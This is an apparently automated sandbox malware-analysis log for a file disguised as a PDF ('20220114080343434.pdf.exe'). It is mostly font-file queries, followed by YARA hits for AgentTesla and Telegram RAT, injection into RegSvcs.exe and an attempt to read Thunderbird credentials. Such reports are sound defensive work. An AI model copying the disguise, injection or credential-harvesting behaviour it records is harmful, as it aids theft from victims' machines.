                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
